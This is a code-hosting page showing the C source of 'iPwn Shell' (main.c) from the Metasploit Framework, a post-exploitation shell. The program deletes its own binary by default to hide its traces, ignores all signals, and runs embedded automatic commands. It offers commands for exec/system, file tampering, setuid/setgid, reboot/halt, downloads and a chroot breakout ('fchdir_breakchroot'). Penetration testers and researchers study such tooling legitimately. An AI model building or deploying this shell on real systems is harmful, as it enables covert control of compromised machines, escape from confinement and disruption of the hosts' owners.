CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/ipwn/main.c
Views: 11766
1
/*

2
 * Copyright (c) 2004-2005 vlad902 <vlad902 [at] gmail.com>

3
 * Copyright (c) 2007 H D Moore <hdm [at] metasploit.com> 

4
 * This file is part of the Metasploit Framework.

5
 * $Revision$

6
 */

7


8
#include <sys/types.h>

9
#include <sys/wait.h>

10
#include <stdlib.h>

11
#include <unistd.h>

12
#include <string.h>

13
#include <errno.h>

14
#include <stdio.h>

15
#include <signal.h>

16


17
#include "cmd.h"

18
#include "auto.h"

19


20
struct __cmdhandler

21
{

22
	char * cmd;

23
	void (* handler)();

24
	unsigned int arg_process;

25
	unsigned int arg_min;

26
	unsigned int arg_max;

27
};

28


29
struct __cmdhandler handlerlist[] =

30
{

31
	{ "help", &cmd_help, 1, 0, 0 },

32
	{ "script", &cmd_script, 1, 1, 1 },			

33
	{ "fork", &cmd_fork, 1, 0, 0 },

34
	{ "exec", &cmd_exec, 1, 1, 14 },

35
	{ "system", &cmd_system, 1, 1, 14 },

36
	{ "quit", &cmd_quit, 1, 0, 0 },

37
	{ "exit", &cmd_quit, 1, 0, 0 },

38


39
	{ "open", &cmd_open, 1, 1, 1 },

40
	{ "lseek", &cmd_lseek, 1, 3, 3 },

41
	{ "read", &cmd_read, 1, 1, 2 },

42
	{ "write", &cmd_write, 1, 1, 2 },

43
	{ "close", &cmd_close, 1, 1, 1 },

44
	{ "dup", &cmd_dup, 1, 1, 1 },

45
	{ "dup2", &cmd_dup2, 1, 2, 2 },

46


47
	{ "ls", &cmd_ls, 1, 0, 1 },

48
	{ "getcwd", &cmd_getcwd, 1, 0, 0 },

49
	{ "pwd", &cmd_getcwd, 1, 0, 0 },

50
	{ "cd", &cmd_setcwd, 1, 0, 1 },

51
	{ "chmod", &cmd_chmod, 1, 2, 2 },

52
	{ "chown", &cmd_chown, 1, 2, 2 },

53
	{ "chgrp", &cmd_chgrp, 1, 2, 2 },

54
	{ "chdir", &cmd_chdir, 1, 1, 1 },

55
	{ "mkdir", &cmd_mkdir, 1, 1, 2 },

56
	{ "rmdir", &cmd_rmdir, 1, 1, 1 },

57
	{ "rename", &cmd_rename, 1, 2, 2 },

58
	{ "unlink", &cmd_unlink, 1, 1, 1 },

59
	{ "chroot", &cmd_chroot, 1, 1, 1 },

60
	{ "link", &cmd_link, 1, 2, 2 },

61
	{ "symlink", &cmd_symlink, 1, 2, 2 },

62
	{ "cp", &cmd_cp, 1, 2, 2 },

63


64
	{ "getid", &cmd_getid, 1, 0, 0 },

65
	{ "setuid", &cmd_setuid, 1, 1, 1 },

66
	{ "setgid", &cmd_setgid, 1, 1, 1 },

67


68
	{ "kill", &cmd_kill, 1, 1, 2 },

69
	{ "getpid", &cmd_getpid, 0, 0, 0 },

70
	{ "getppid", &cmd_getppid, 0, 0, 0 },

71
	{ "ps", &cmd_ps, 0, 0, 0 },

72
	

73
	{ "time", &cmd_time, 1, 0, 0, },

74
	{ "uname", &cmd_uname, 1, 0, 0 },

75
	{ "hostname", &cmd_hostname, 1, 0, 1 },

76
	{ "reboot", &cmd_reboot, 1, 0, 0 },

77
	{ "shutdown", &cmd_shutdown, 1, 0, 0 },

78
	{ "halt", &cmd_halt, 1, 0, 0 },

79


80
	{ "lsfd", &cmd_lsfd, 1, 0, 0 },

81
	

82
	{ "download", &cmd_download, 1, 2, 2 },

83


84
	{ "fchdir_breakchroot", &cmd_fchdir_breakchroot, 1, 1, 1 },

85
};

86


87
#define	HANDLERLIST_SIZE	(sizeof(handlerlist) / sizeof(struct __cmdhandler))

88
#define	MAX_ARGV	15

89
#define VERSION "0.01"

90


91
int main(int argc, char **argv) {

92
	char *p, *s, *b;

93
	int sig;

94


95
	if (argc <= 1 || strcmp(argv[1], "-k") != 0) {

96
		printf("Self-destruction mode is enabled by default, use -k to keep.\n");

97
		printf("Removing %s...\n", argv[0]);

98
		unlink(argv[0]);

99
	}

100
	

101
	/* process any embedded commands */

102
	if (automatic[0] != '#') {

103
		b = s = strdup(automatic);

104
		while ((p = strstr(s, "\n")) != NULL) {

105
			*p = '\0';

106
			

107
			printf("(auto) %s\n", s);

108
			process_input(s, strlen(s));

109
			

110
			s = p + 1;

111
		}

112
		printf("(auto) %s\n", s);

113
		

114
		process_input(s, strlen(s));

115
		free(b);

116
	}

117
	

118
	/* XXX: Big negative sbrk() to remove heap? */

119
	for(sig = 1; sig <= 64; sig++)

120
		signal(sig, SIG_IGN);

121


122
	signal(SIGCHLD, &sig_chld_waitpid);

123


124
	setvbuf(stdout, (char *)NULL, _IONBF, 0);

125
	printf(

126
	" __________________\n"

127
	"< iPwn Shell v%s >\n"

128
	" ------------------\n"

129
	"        \\   ^__^\n"

130
	"         \\  (00)\\_______\n"

131
	"            (__)\\       )\\/\\\n"

132
	"                ||----w |\n"

133
	"                ||     ||\n\n", VERSION);

134
    

135
	while(1)

136
	{

137
		char cmd[2048];

138
		char cmd_bak[sizeof(cmd)];

139
		char buf[1024];

140
		char *cwd;

141
	

142
		if(getcwd(buf, sizeof(buf)) == NULL)

143
			cwd = "(unknown)";

144
		else

145
			cwd = buf;

146
	        

147
		printf("ipwn (uid=%d) (%s) > ", getuid(), cwd);

148


149
		memset(cmd, 0, sizeof(cmd));

150
		if(fgets(cmd, sizeof(cmd), stdin) == NULL)

151
			exit(0);

152
		

153
		chomp(cmd);

154
		memcpy(cmd_bak, cmd, sizeof(cmd_bak));

155
		

156
		process_input(cmd, sizeof(cmd));

157
	}

158
}

159


160


161
int process_input(char *cmd, int cmd_size) {

162
	char * argv[MAX_ARGV];

163
	int argc;

164
	int i, hit;

165
	char *bak;

166
				

167
	parse(cmd, &argc, argv);

168
	if(argc == 0)

169
		return(0);

170


171
	bak = strdup(cmd);

172
	

173
	for(hit = i = 0; i < HANDLERLIST_SIZE; i++)

174
	{

175
		if(strcmp(argv[0], handlerlist[i].cmd) == 0)

176
		{

177
			hit = 1;

178


179
			if(handlerlist[i].arg_process)

180
			{

181
				if(argc > handlerlist[i].arg_max+1)

182
					printf("%s: Too many arguments\n", argv[0]);

183
				else if(argc < handlerlist[i].arg_min+1)

184
					printf("%s: Too few arguments\n", argv[0]);

185
				else

186
					handlerlist[i].handler(argc, argv);

187
			}

188
			else

189
			{

190
				handlerlist[i].handler(bak + strlen(handlerlist[i].cmd) + 1);

191
			}

192
		}

193
	}

194


195
	if(hit == 0)

196
	{

197
		printf("%s: Unknown command.\n", argv[0]);

198
	}

199
	

200
	free(bak);

201
	

202
	return 0;

203
}

204


205


206
void parse(char * str, int * const argc, char * argv[])

207
{

208
	*argc = 0;

209
	argv[0] = '\0';

210
				

211
	if(strlen(str) == 0)

212
		return;

213


214
	for(argv[(*argc)++] = str; strlen(str) && *argc < MAX_ARGV; str++)

215
	{

216
		if(*str == ' ')

217
		{

218
			*str = '\0';

219
			argv[(*argc)++] = str+1;

220
			argv[(*argc)] = '\0';

221
		}

222
		if(*str == '\\')

223
		{

224
			switch(*(str + 1))

225
			{

226
//				case 'n':

227
//					break;

228
				default:

229
					memmove(str, str+1, strlen(str));

230
					break;

231
			}

232
		}

233
	}

234
}

235


236
void chomp(char * str)

237
{

238
	if(strlen(str) > 0 && str[strlen(str) - 1] == '\n')

239
		str[strlen(str) - 1] = '\0';

240
	if(strlen(str) > 0 && str[strlen(str) - 1] == '\r')

241
		str[strlen(str) - 1] = '\0';

242
}

243


244


245
void sig_chld_ignore(int signal)

246
{

247
	return;

248
}

249


250
void sig_chld_waitpid(int signal)

251
{

252
	while(waitpid(-1, 0, WNOHANG) > 0);

253
}

254


255